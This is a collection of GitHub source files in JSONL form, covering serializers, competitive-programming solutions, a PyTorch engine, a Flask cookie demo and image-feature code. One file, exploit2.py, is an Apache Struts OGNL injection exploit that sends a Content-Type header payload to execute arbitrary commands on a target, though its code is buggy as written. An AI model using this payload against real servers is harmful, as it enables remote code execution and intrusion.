'usuario_id',\n 'usuario_nombre',\n 'usuario_img',\n 'usuario',\n 'texto',\n 'created_date',\n )\n\n def get_usuario_id(self, obj):\n\n try:\n return obj.usuario.id\n except:\n return \"\"\n\n def get_usuario_nombre(self, obj):\n\n try:\n return obj.usuario.get_full_name()\n except:\n return \"\"\n\n def get_usuario_img(self, obj):\n\n try:\n return obj.usuario.profile.imagen.url\n except:\n return \"\"\n","repo_name":"angiealejo/CoreM","sub_path":"comunicacion/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5008143027","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport sys\n\ndef exploit(cmd):\n ognl_payload = \"~multipart/form-data%{\"\n ognl_payload += \"#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,\"\n ognl_payload += \"@java.lang.Runtime@getRuntime().exec('{}')\".format(cmd)\n ognl_payload += \"}\"\n\n if not \":\" in host:\n host = \"{}:8080\".format(host)\n\n url = \"http://{}/basic-struts/helloWorld.action\".format(host)\n\n headers = {'Content-Type': ognl_payload}\n request = urllib2.Request(url, headers=headers)\n response = urllib2.urlopen(request).read()\n\n\nif len(sys.argv) < 3:\n sys.exit('Usage: %s ' % sys.argv[0])\nelse:\n exploit(sys.argv[1],sys.argv[2])\n","repo_name":"iflanagan/pythonExploits","sub_path":"exploit2.py","file_name":"exploit2.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20096237525","text":"def correct_placement(pairs):\n sorted_pairs = [i[0] for i in sorted(enumerate(pairs), key=lambda x: x[1])]\n advantage_pairs = set()\n only_pairs = set()\n placement = [-1] * len(pairs)\n for j in range(len(sorted_pairs)):\n index = sorted_pairs[j]\n pair = pairs[index]\n for advantage_pair in advantage_pairs:\n if pair[0] > advantage_pair[1][0] and pair[1] > advantage_pair[1][1]:\n placement[index] = advantage_pair[0] + 1\n break\n elif pair[0] == advantage_pair[1][0] and pair[1] == advantage_pair[1][1]:\n placement[index] = placement[advantage_pair[0]]\n break\n if placement[index] < 0 and pair not in only_pairs:\n only_pairs.add(pair)\n advantage_pairs.add((index, pair))\n return placement\n\n\nif __name__ == \"__main__\":\n num_test = int(input())\n for i in range(num_test):\n num_num = int(input())\n pairs = []\n for i in range(num_num):\n pair = tuple(sorted([int(i) for i in input().split()]))\n pairs.append(pair)\n print(\" \".join([str(i) for i in correct_placement(pairs)]))\n","repo_name":"tqa236/codeforces","sub_path":"Round693/correct_placement/correct_placement.py","file_name":"correct_placement.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74104421199","text":"# 给定一个整数数组 nums ���找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和。\n#\n# 示例:\n#\n# 输入: [-2,1,-3,4,-1,2,1,-5,4],\n# 输出: 6\n# 解释: 连续子数组 [4,-1,2,1] 的和最大,为 6。\nclass Solution:\n def maxSubArray(self, nums: [int]):\n # 利用给出的测试例进行简单的分析。\n temp = nums[0]\n max_ = temp\n for i in range(1, len(nums)):\n if temp > 0:\n temp += nums[i]\n max_ = max(max_, temp)\n\n else:\n temp = nums[i]\n max_ = max(max_, temp)\n return max_\n\n def maxSubArray2(self, nums: [int]) -> int:\n tmp = nums[0]\n max_ = tmp\n n = len(nums)\n for i in range(1, n):\n # 当当前序列加上此时的元素的值大于tmp的值,说明最大序列和可能出现在后续序列中,记录此时的最大值\n if tmp + nums[i] > nums[i]:\n 
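# extending the running sum beats restarting from nums[i]; record the best so far\n                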
max_ = max(max_, tmp + nums[i])\n tmp = tmp + nums[i]\n else:\n # Otherwise the running sum is dead weight: the current subarray ends here. Restart from this element\n # and record the maximum seen so far\n max_ = max(max_, tmp, tmp + nums[i], nums[i])\n tmp = nums[i]\n return max_\n\n\nif __name__ == '__main__':\n s = Solution()\n arr = [8, -19, 5, -4, 20]\n print(s.maxSubArray(arr))","repo_name":"haidfs/LeetCode","sub_path":"Hot100/最长子序列和.py","file_name":"最长子序列和.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"29629188478","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom dataclasses import dataclass\n\nfrom types import SimpleNamespace\nfrom contextlib import contextmanager\n\nimport torch as th\n# imported at runtime (not under TYPE_CHECKING): clip_grad_by_norm/clip_grad_by_value call these\nfrom torch.nn.utils.clip_grad import clip_grad_norm_, clip_grad_value_\n\nfrom dltk.utils import autocast_cls, grad_scaler\nfrom .events import AbstractEventTarget, Event, EventTarget\n\nif TYPE_CHECKING:\n from typing import Any, Union\n from collections.abc import Callable, Iterable, Iterator\n\n from torch.nn import Module, Parameter\n from torch.optim import Optimizer\n from torch.optim.lr_scheduler import _LRScheduler as LRScheduler\n\n from dltk.types import Kwargs, Factory\n\n LRSchedArgs = tuple[Factory[LRScheduler], Kwargs]\n\n__all__ = [\n \"AbstractEngine\",\n \"Context\",\n \"Every\",\n \"ExecMode\",\n \"LocalEngine\"\n]\n\nclass ExecMode(Enum):\n TRAIN = \"train\"\n DEV = \"dev\"\n EVAL = \"evaluate\"\n\n UNKNOWN = \"\"\n\nclass Context(SimpleNamespace):\n # map events to the attribute names set in __init__, so count_for's getattr resolves\n _event_to_count = {\n Event.EPOCH_STARTED: \"epoch_count\",\n Event.EPOCH_ENDED: \"epoch_count\",\n Event.ITER_STARTED: \"iter_count\",\n Event.ITER_ENDED: \"iter_count\"\n }\n\n def __init__(self, **kwargs: Any):\n super().__init__(**kwargs)\n\n self.epoch_count = 0\n self.iter_count = 0\n self.mode = ExecMode.UNKNOWN\n\n def count_for(self, event: Event) -> int:\n return getattr(self, self._event_to_count[event])\n\nclass AbstractEngine(AbstractEventTarget):\n @property\n @abstractmethod\n def training(self) -> bool:\n raise NotImplementedError\n \n @abstractmethod\n def train(self, training: bool = True):\n raise NotImplementedError\n \n def eval(self):\n self.train(False)\n\nclass LocalEngine(AbstractEngine, EventTarget):\n ctx: Context\n\n def __init__(self, model: Module, device: Union[th.device, str], enable_amp: bool = True):\n super().__init__()\n\n device = th.device(device)\n # Device for current node\n self.device = device\n # Model on given device\n self.model = model.to(device)\n\n # AMP autocast class\n self._autocast_cls = autocast_cls(device)\n # Gradient scaler\n self._scaler = grad_scaler(device, enabled=enable_amp)\n # Optimizers\n self._optimizers: dict[str, Optimizer] = {}\n # Learning rate schedulers\n self._lr_scheds: dict[str, list[LRScheduler]] = {}\n\n # Optimizers with gradients unscaled\n self._unscaled_optims: set[str] = set()\n \n def _params_for_optimizers(self, optim_names: Iterable[str]) -> Iterator[Parameter]:\n optimizers = self._optimizers\n\n # For each selected optimizer ...\n for optim_name in optim_names:\n optimizer = optimizers[optim_name]\n # Yield each parameter in all parameter groups\n for param_group in optimizer.param_groups:\n for param in param_group[\"params\"]:\n yield param\n\n @property\n def enable_amp(self) -> bool:\n return self._scaler.is_enabled()\n\n @property\n def training(self) -> bool:\n return self.model.training\n\n def train(self, training: bool = True):\n 
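\"\"\"Switch the wrapped model between train and eval mode (thin pass-through to torch.nn.Module.train).\"\"\"\n 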
self.model.train(training)\n\n def state_dict(self) -> dict[str, Any]:\n return {\n \"model\": self.model.state_dict(),\n \"scaler\": self._scaler.state_dict(),\n \"optimizers\": {\n optim_name: optimizer.state_dict() \\\n for optim_name, optimizer in self._optimizers.items()\n },\n \"lr_scheds\": {\n optim_name: [lr_sched.state_dict() for lr_sched in lr_scheds] \\\n for optim_name, lr_scheds in self._lr_scheds.items()\n }\n }\n \n def load_state_dict(self, state: dict[str, Any]):\n optimizers = self._optimizers\n lr_scheds = self._lr_scheds\n\n # Load state for the model\n self.model.load_state_dict(state[\"model\"])\n # Load state for gradient scaler\n self._scaler.load_state_dict(state[\"scaler\"])\n # Load state for optimizers (iterate over items, not just the dict keys)\n for optim_name, optim_state in state[\"optimizers\"].items():\n optimizers[optim_name].load_state_dict(optim_state)\n # Load state for learning rate schedulers (iterate over items, not just the dict keys)\n for optim_name, lr_sched_states in state[\"lr_scheds\"].items():\n for lr_sched, lr_sched_state in zip(lr_scheds[optim_name], lr_sched_states):\n lr_sched.load_state_dict(lr_sched_state)\n\n def create_optimizer(self, name: str, optim_factory: Callable[..., Optimizer],\n params: Union[Iterable[Parameter], Iterable[Kwargs]], optim_kwargs: Kwargs = {},\n lr_sched_args: Iterable[LRSchedArgs] = ()):\n # Create optimizer\n self._optimizers[name] = optimizer = optim_factory(params, **optim_kwargs)\n # Create LR schedulers\n self._lr_scheds[name] = [factory(optimizer, **kwargs) for factory, kwargs in lr_sched_args]\n\n @contextmanager\n def forward_ctx(self) -> Iterator[None]:\n # Enable gradient computation for training and AMP\n with th.set_grad_enabled(self.training), self._autocast_cls(self.enable_amp):\n yield\n\n def backward(self, *losses: th.Tensor, retain_graph: bool = False, create_graph: bool = False):\n scaler = self._scaler\n\n for loss in losses:\n scaler.scale(loss).backward(retain_graph=retain_graph, create_graph=create_graph)\n\n def unscale_grads(self, *optim_names: str):\n scaler = self._scaler\n optimizers = self._optimizers\n unscaled_optims = self._unscaled_optims\n\n optim_names = optim_names or optimizers.keys()\n # Unscale given (or all) optimizers\n for optim_name in optim_names:\n if optim_name in unscaled_optims:\n continue\n \n scaler.unscale_(optimizers[optim_name])\n # Mark optimizer as unscaled\n unscaled_optims.add(optim_name)\n \n def clip_grad_by_norm(self, max_norm: float, *optim_names: str, norm_type: float = 2.):\n self.unscale_grads(*optim_names)\n\n params = self._params_for_optimizers(optim_names) if optim_names \\\n else self.model.parameters()\n # Clip gradients by norm\n clip_grad_norm_(params, max_norm, norm_type)\n\n def clip_grad_by_value(self, clip_value: float, *optim_names: str):\n self.unscale_grads(*optim_names)\n\n params = self._params_for_optimizers(optim_names) if optim_names \\\n else self.model.parameters()\n # Clip gradients by value\n clip_grad_value_(params, clip_value)\n\n def step(self, *optim_names: str):\n scaler = self._scaler\n optimizers = self._optimizers\n lr_scheds = self._lr_scheds\n unscaled_optims = self._unscaled_optims\n\n optim_names = optim_names or optimizers.keys()\n # Step given (or all) optimizers\n for optim_name in optim_names:\n optimizer = optimizers[optim_name]\n\n scaler.step(optimizer)\n # Step learning rate schedulers\n for lr_sched in lr_scheds[optim_name]:\n lr_sched.step()\n # Clear gradients\n optimizer.zero_grad()\n\n # Remove optimizer from unscaled optimizers\n if optim_name in unscaled_optims:\n 
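# clearing the marker means the next unscale_grads() call will unscale the fresh gradients of the following step\n 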
unscaled_optims.remove(optim_name)\n \n # Update gradient scaler\n scaler.update()\n\n@dataclass\nclass Every:\n interval: int\n\n def __call__(self, engine: LocalEngine, *args: Any, event: Event, **kwargs: Any):\n return engine.ctx.count_for(event) % self.interval == 0\n","repo_name":"lqf96/dltk","sub_path":"dltk/engine/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"15180327087","text":"from flask import Flask, request, Response\nfrom datetime import datetime, timedelta\nfrom crmviews import bp\n\napp = Flask(__name__)\napp.register_blueprint(bp)\n# C:\\Windows\\System32\\drivers\\etc\\hosts\n# add to the hosts file: 127.0.0.1 chain.com\n# add to the hosts file: 127.0.0.1 crm.chain.com\n# then open in the browser: http://crm.chain.com:5000/\napp.config['SERVER_NAME'] = 'chain.com:5000'\n\n\n@app.route('/')\ndef hello_world():\n response = Response('set cookie')\n\n # expires = datetime(year=2020, month=4, day=13, hour=16, minute=52, second=20)\n # response.set_cookie('username', 'chen', max_age=60) # max_age is the cookie's lifetime, in seconds\n # expires sets the expiry moment, as Greenwich (GMT) time\n # response.set_cookie('username', 'chen', expires=expires)\n\n expires = datetime.now() + timedelta(days=30, hours=16)\n response.set_cookie('username', 'chen', expires=expires, domain='.chain.com')\n return response\n\n@app.route('/del/')\ndef del_cookie():\n response = Response('delete cookie')\n response.delete_cookie('username')\n return response\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"chenyuchuting/Flask","sub_path":"6_WTForms_Cookie_Files_CRSF/5_cookie/1_test_cookie/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"40164920651","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nlanguages = [\n('en', 'English'),\n('fr', 'French'),\n('de', 'German'),\n('es', 'Spanish'),\n('it', 'Italian'),\n('ja', 'Japanese'),\n('ru', 'Russian'),\n('la', 'Latin'),\n('ar', 'Arabic'),\n('cn', 'Chinese (with incorrect code)'),\n('pl', 'Polish'),\n('hi', 'Hindi'),\n('el', 'Greek'),\n('da', 'Danish'),\n('pt', 'Portuguese'),\n('he', 'Hebrew'),\n('vi', 'Vietnamese'),\n('zh', 'Chinese'),\n('yi', 'Yiddish'),\n('no', 'Norwegian'),\n('cs', 'Czech'),\n('sv', 'Swedish'),\n('hu', 'Hungarian'),\n('eo', 'Esperanto'),\n('fa', 'Persian'),\n('xh', 'Xhosa'),\n('zu', 'Zulu'),\n('ga', 'Irish'),\n('af', 'Afrikaans'),\n('ne', 'Nepali'),\n('ny', 'Chichewa'),\n('ta', 'Tamil'),\n('gd', 'Scottish Gaelic'),\n('tr', 'Turkish'),\n('ur', 'Urdu'),\n('th', 'Thai'),\n('st', 'Southern Sotho')\n]\n\ngc = frozenset(list('abcdefghjiklmnopqrstuvwxyz'))\n\ndef fix(s):\n r = []\n b = True\n for c in s:\n if c.lower() in gc:\n if b:\n r.append(c.upper())\n b = False\n else:\n r.append(c)\n else:\n b = True\n return ''.join(r)\n\nfor code, language in languages:\n cn = fix(language)\n fn = 'IsLanguage%s.py' % cn\n f = open(fn, 'wt')\n f.write(\"\"\"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom Feature import Feature\n\nclass IsLanguage%s(Feature):\n description = \\\"\\\"\\\"\nRegional: Spoken languages: is there %s?\n\\\"\\\"\\\".strip()\n\n def __init__(self, *args, **kwargs):\n Feature.__init__(self)\n \n def extract(self, m):\n for sl in m.spoken_languages:\n if sl['iso_639_1'] == '%s':\n return True\n return False\n\"\"\" % (cn, language, code))\n 
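# each generated IsLanguage<Name> plugin returns True when the movie's spoken_languages contain this iso_639_1 code\n 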
f.close()\n","repo_name":"unoduetre/MovieRecommendator","sub_path":"featuremaker/plugins/generators/spoken-language.py","file_name":"spoken-language.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"36765121118","text":"from matplotlib import pyplot as plt\nfrom scipy import misc\nimport numpy as np\nimport cv2\nimport gist #https://github.com/yuichiroTCY/lear-gist-python\nfrom skimage import feature\n#from sklearn.preprocessing import normalize\nfrom six.moves import cPickle as pickle\n\ndef load_data():\n\tpickle_file = '/mnt/B8308B68308B2D06/CF/pickle_file_data2'\n\twith open(pickle_file, 'rb') as f:\n\t\tsave = pickle.load(f)\n\t\ttrain_dataset = save['train_dataset']\n\t\ttrain_labels = save['train_labels']\n\t\ttest_dataset = save['test_dataset']\n\t\ttest_labels = save['test_labels']\n\t\tdel save\t# hint to help gc free up memory\n\t\tprint('Training set', train_dataset.shape, len(train_labels))\n\t\tprint('Test set', test_dataset.shape, len(test_labels))\t\n\treturn train_dataset.astype(np.uint8),train_labels\n\n# 3 histograms, one per color channel (append instead of indexing an empty list, which would raise IndexError)\ndef color_hist(img, histSize=256):\n\thist = []\n\thist.append(cv2.calcHist([img],[0],None,[histSize],[0,256]))\n\thist.append(cv2.calcHist([img],[1],None,[histSize],[0,256]))\n\thist.append(cv2.calcHist([img],[2],None,[histSize],[0,256]))\n\t#plt.plot(hist)\n\t#plt.xlim([0,256])\n\t#plt.show()\n\treturn hist\n\n#gist descriptor of size 960\ndef gist_descriptor(img):\n\treturn gist.extract(img)\n\n#sift descriptor of size number of (keypoint x 128)\ndef sift(img):\n\t#plt.imshow(img)\n\t#plt.show()\n\tgray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\tsift = cv2.xfeatures2d.SIFT_create()\n\t(kp, desc) = sift.detectAndCompute(gray, None)\n\t# print(desc.shape)\n\t# print(len(kp))\n\t# im=cv2.drawKeypoints(gray,kp,None,flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\t# plt.imshow(im)\n\t# plt.show()\n\treturn kp, desc\n\n#surf descriptor of size number of (keypoint x 128)\nSURF_threashold = 500\ndef surf(img):\n\tsurf = cv2.xfeatures2d.SURF_create(SURF_threashold)\n\tsurf.setExtended(True)\n\tkp, desc = surf.detectAndCompute(img,None)\n\t# print(desc.shape)\n\t# print(len(kp))\n\t# im=cv2.drawKeypoints(img,kp,None,(255,0,0),4)\n\t# plt.imshow(im)\n\t# plt.show()\n\treturn kp, desc\n\ndef save_vocabulary(BOWdict,name):\n\tf = open(name, 'wb')\n\tsave = {\n\t\tname: BOWdict.getVocabulary()\n\t}\n\tpickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\n\tf.close()\n\n#######################Bag of words for SIFT#########################################\n#for reference https://github.com/briansrls/SIFTBOW/blob/master/SIFTBOW.py\ndef bag_of_words_sift(data, dictionarySize=10):\n\tBOW = cv2.BOWKMeansTrainer(dictionarySize)\n\tfor i in range(len(data)):\n\t\ttry:\n\t\t\tkp, dsc = sift(data[i])\n\t\t\tBOW.add(dsc)\n\t\texcept Exception: \n\t\t\tprint(i)\n\t\n\tprint(\"Clustering\")\n\tdictionary = BOW.cluster()\n\tprint(\"Finish\")\n\n\tsift2 = cv2.xfeatures2d.SIFT_create()\n\tbowDiction = cv2.BOWImgDescriptorExtractor(sift2, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(dictionary)\n\tsave_vocabulary(bowDiction,\"Sift_Voc\")\n\treturn bowDiction\n\ndef bow_feature_extract_sift(bowDiction, img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n kp,desc = sift(img)\n return bowDiction.compute(gray, kp, desc)\n\ndef load_sift_bow_diction(file):\n\twith open(file, 'rb') as f:\n\t\tsave = pickle.load(f)\n\t\tvocabulary = save['Sift_Voc']\n\t\tdel save\t# 
hint to help gc free up memory\n\tsift2 = cv2.xfeatures2d.SIFT_create()\n\tbowDiction = cv2.BOWImgDescriptorExtractor(sift2, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(vocabulary)\n\treturn bowDiction\n\n#######################Bag of words for SURF#########################################\ndef bag_of_words_surf(data, dictionarySize=10):\n\tBOW = cv2.BOWKMeansTrainer(dictionarySize)\n\tx=0\n\tfor i in range(len(data)):\n\t\ttry:\n\t\t\tkp, dsc = surf(data[i])\n\t\t\tBOW.add(dsc)\n\t\texcept Exception: \n\t\t\tprint(i)\n\t\t\tx+=1\n\tprint(\"--------------------------------->\",x)\n\tprint(\"Clustering\")\n\tdictionary = BOW.cluster()\n\tprint(\"Finish\")\n\n\tsurf2 = cv2.xfeatures2d.SURF_create(SURF_threashold)\n\tsurf2.setExtended(True)\n\tbowDiction = cv2.BOWImgDescriptorExtractor(surf2, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(dictionary)\n\tsave_vocabulary(bowDiction,\"Surf_Voc\")\n\treturn bowDiction\n\ndef bow_feature_extract_surf(bowDiction, img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n kp,desc = surf(img)\n return bowDiction.compute(gray, kp, desc)\n\ndef load_surf_bow_diction(file):\n\twith open(file, 'rb') as f:\n\t\tsave = pickle.load(f)\n\t\tvocabulary = save[file]\n\t\tdel save\t# hint to help gc free up memory\n\tsurf = cv2.xfeatures2d.SURF_create(SURF_threashold)\n\tsurf.setExtended(True)\n\tbowDiction = cv2.BOWImgDescriptorExtractor(surf, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(vocabulary)\n\treturn bowDiction\n########################################################################################\n\ndef build_gabor_filter():\n\tfilters = []\n\tksize = 31\n\tfor theta in np.arange(0, np.pi, np.pi / 16):\n\t\tkern = cv2.getGaborKernel((ksize, ksize), 4.0, theta, 10.0, 1.0, 0, ktype=cv2.CV_32F)\n\t\tkern /= 1.5*kern.sum()\n\t\tfilters.append(kern)\n\treturn filters\n\ndef gabor(img):\n\tfilters = build_gabor_filter()\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\taccum = np.zeros_like(gray)\n\tfor kern in filters:\n\t\tfimg = cv2.filter2D(gray, cv2.CV_8UC3, kern)\n\t\tnp.maximum(accum, fimg, accum)\n\t# (hist, _) = np.histogram(accum.ravel(),\n\t# \tbins=np.arange(0, 57 + 3),\n\t# \trange=(0, 57 + 2))\n \n\t# # normalize the histogram\n\t# hist = hist.astype(\"float\")\n\t# hist /= (hist.sum() + 1e-7)\n\treturn accum - gray\n\t# return hist \n\n\ndef local_binary_pattern(img):\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tnumPoints = 57\n\tradius = 8\n\teps=1e-7\n\t# of the image, and then use the LBP representation\n\t# to build the histogram of patterns\n\tlbp = feature.local_binary_pattern(gray, numPoints,\n\t\tradius, method=\"uniform\")\n\t# (hist, _) = np.histogram(lbp.ravel(),\n\t# \tbins=np.arange(0, numPoints + 3),\n\t# \trange=(0, numPoints + 2))\n \n\t# # normalize the histogram\n\t# hist = hist.astype(\"float\")\n\t# hist /= (hist.sum() + eps)\n \n\t# return the histogram of Local Binary Patterns\n\treturn lbp\n\n#displays currently edges image only, can't determine the edge direction histogram\ndef edge_direction_histogram(img):\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tedges = cv2.Canny(gray,100,200)\n\tprint(edges.shape)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(edges,cmap = 'gray')\n\tplt.title('Edge Image'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\n##################################salah test###############################\n# img = misc.imread('6.jpg')\n# d=sift(img)\n# 
print(img.shape)\n\n# #gabor test src=https://cvtuts.wordpress.com/2014/04/27/gabor-filters-a-practical-overview/\n# filters = build_gabor_filter()\n# res1 = gabor(img, filters)\n# print(res1.shape)\n# cv2.imshow('result', res1)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\n#local_binary_pattern src=http://www.pyimagesearch.com/2015/12/07/local-binary-patterns-with-python-opencv/\n# res2 = local_binary_pattern(img)\n\n# #edge direction histogram\n# edge_direction_histogram(img)\n############################################################################\n\n\n# data, label = load_data()\n# data, label = data[:10000], label[:10000]\n\n# BOWdict = bag_of_words_sift(data)\n# BOWdict = load_sift_bow_diction(\"Surf_Voc\")\n\n\n# for i in range(10):\n# \td = bow_feature_extract_sift(BOWdict,data[i])\n# \tprint(d.shape,label[i])\n# \tprint(d)\n# \tprint(\"__________________________________________________________\")\n\n\n\n\n# print(\"Done\")\n","repo_name":"alfredsamy/Multimodal-Deep-Similarity-Learning","sub_path":"descriptor.py","file_name":"descriptor.py","file_ext":"py","file_size_in_byte":7274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"8602036992","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom collections import defaultdict\n\n\nclass RegexTable(object):\n\n def __init__(self, l_tpl, l_regex):\n assert len(l_tpl) == len(l_regex)\n self._table = self._make_table(l_tpl, l_regex)\n\n def _make_table(self, l_tpl, l_regex):\n return [(tplid, reobj) for tplid, reobj in enumerate(l_regex)]\n\n def search(self, mes):\n for tplid, reobj in self._table:\n matchobj = reobj.match(mes)\n if matchobj:\n return tplid, matchobj\n else:\n return None\n\n def shuffle(self):\n import random\n random.shuffle(self._table)\n\n\nclass RegexHashTable(RegexTable):\n\n def __init__(self, l_tpl, l_regex, headlen=5):\n assert isinstance(headlen, int)\n assert headlen > 0\n self._headlen = headlen\n self._table = None\n super().__init__(l_tpl, l_regex)\n\n def _make_table(self, l_tpl, l_regex):\n table = defaultdict(list)\n for tplid, (tpl, reobj) in enumerate(zip(l_tpl, l_regex)):\n if self._head_isstable(tpl, self._headlen):\n key = tpl[:self._headlen]\n else:\n key = \"\"\n table[key].append((tplid, reobj))\n return table\n\n @staticmethod\n def _head_isstable(tpl, headlen):\n from amulog import lt_common\n replacer = lt_common.REPLACER_REGEX\n matchobj = replacer.search(tpl)\n if matchobj:\n return matchobj.start() >= headlen\n else:\n return True\n\n def search(self, mes):\n key = mes[:self._headlen]\n if key not in self._table:\n key = \"\"\n\n for tplid, reobj in self._table[key]:\n matchobj = reobj.match(mes)\n if matchobj:\n return tplid, matchobj\n if key != \"\":\n # fall back to the catch-all bucket (skip when it was already scanned above)\n for tplid, reobj in self._table[\"\"]:\n matchobj = reobj.match(mes)\n if matchobj:\n return tplid, matchobj\n return None\n\n def shuffle(self):\n import random\n for key, subtable in self._table.items():\n random.shuffle(subtable)\n","repo_name":"amulog/amulog","sub_path":"amulog/external/regexhash.py","file_name":"regexhash.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"29"}
{"seq_id":"34433157256","text":"def solution(s):\n s = s.lower()\n L=s.split(\" \")\n answer = \"\"\n for i in L:\n i= i.capitalize()\n answer+= i+\" \"\n return answer[:-1]\n\n# What's the difference? The version below only scores 21.9 points:\n# split(\" \") keeps the empty strings produced by consecutive spaces, so the original spacing survives;\n# split() collapses all whitespace, so inputs with repeated spaces are rebuilt incorrectly.\n# def solution(s):\n# answer = ''\n# s = s.lower()\n# arr = s.split()\n# for word in arr:\n# answer += word.capitalize() + \" \"\n# return answer[:-1]\n","repo_name":"Team-AiK/TT-Thinking-Training","sub_path":"Week19/groovypark/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"}
{"seq_id":"2379636430","text":"from keyboards import Keyboard, AnsiKeyboard, IsoKeyboard\nfrom keyboards import layout_symbols\nfrom static import locale_ids, SC, VK, sym_upper, static_text, SC_REVERSE\nfrom locale import windows_locale\nimport re\n\n\n# KC stands for 'key code'\n\n\ndef _get_locale_id(language=\"english\", region=None):\n \"\"\"If the locale id exists, gives it back. If it doesn't, raises a KeyError\"\"\"\n if region:\n try:\n return locale_ids[f\"{language.lower()} - {region.lower()}\"]\n except KeyError:\n print(f\"{language} - {region} is not a valid identifier\")\n raise\n else:\n try:\n return locale_ids[language]\n except KeyError:\n print(f\"{language} unfortunately does not exist\")\n raise\n\n\ndef _make_rows_scs(keyboard, has_symbols: bool):\n \"\"\"Depending on the keyboard type, creates rows of scs and\n keys with or without custom numbers, an iso key or symbols\"\"\"\n if type(keyboard) == Keyboard:\n try:\n symbols = layout_symbols[keyboard.name]\n except KeyError:\n symbols = layout_symbols[\"dvorak\"]\n if has_symbols:\n rows = [\"1234567890\", keyboard.top_row, keyboard.homerow, keyboard.bot_row, symbols]\n scs = [SC[\"nums\"], SC[\"top_row\"], SC[\"homerow\"], SC[\"bot_row\"], SC[\"symbols\"]]\n return rows, scs\n else:\n rows = [\"1234567890\", keyboard.top_row, keyboard.homerow, keyboard.bot_row]\n scs = [SC[\"nums\"], SC[\"top_row\"], SC[\"homerow\"], SC[\"bot_row\"]]\n return rows, scs\n else:\n rows = [keyboard.nums, keyboard.top_row, keyboard.homerow, keyboard.bot_row,\n keyboard.symbols if keyboard.symbols != \"*******\" else layout_symbols[\"dvorak\"]]\n scs = [SC[\"nums\"], SC[\"top_row\"], SC[\"homerow\"], SC[\"bot_row\"], SC[\"symbols\"]]\n return rows, scs\n\n\ndef _get_kc_line(key: str, sc: str):\n \"\"\"create a line containing sc, vk and key information. 
The format is as follows:\n <sc> - <vk> - <cap> - <default> - <shift> - <ctrl>.\n Note that the ctrl ascii code is set to be -1 (doesn't exist).\"\"\"\n no_cap = key != key.upper()\n hex_def = hex(ord(key))[2:]\n hex_upper = hex(ord(sym_upper[key]))[2:] if not no_cap else hex(ord(key.upper()))[2:]\n if sc != \"iso_key\":\n return f\"{sc}\\t{VK[key]}\\t{int(no_cap)}\\t00{hex_def}\\t00{hex_upper}\\t-1\"\n else:\n return f\"{SC[sc]}\\t{VK['iso_key']}\\t{int(no_cap)}\\t00{hex_def}\\t00{hex_upper}\\t-1\"\n\n\ndef keyboard_to_klc(keyboard, language=\"english\", region=None, has_symbols=True, directory=\"klc_files\"):\n \"\"\"Takes a Keyboard, AnsiKeyboard or IsoKeyboard object and generates a .klc file corresponding to its name.\n If no symbols, numbers or iso keys are present, uses dvorak symbols, 1234567890 numbers and \\\\\\\\ by default.\"\"\"\n assert type(keyboard) == Keyboard or type(keyboard) == AnsiKeyboard or type(keyboard) == IsoKeyboard,\\\n \"keyboard should be a Keyboard object\"\n locale_id = _get_locale_id(language, region)\n locale_name = windows_locale[int(locale_id, 16)]\n # the .klc header must start with the KBD tag so klc_to_keyboard can parse the name and description back out\n description = f\"KBD\\t{keyboard.name}\\t\\\"{keyboard.description}\\\"\\n\\nCOPYRIGHT\\t\\\"(c) 2021 OEM\\\"\\n\\nCOMPANY\\t\\\"OEM\\\"\\n\\n\"\\\n 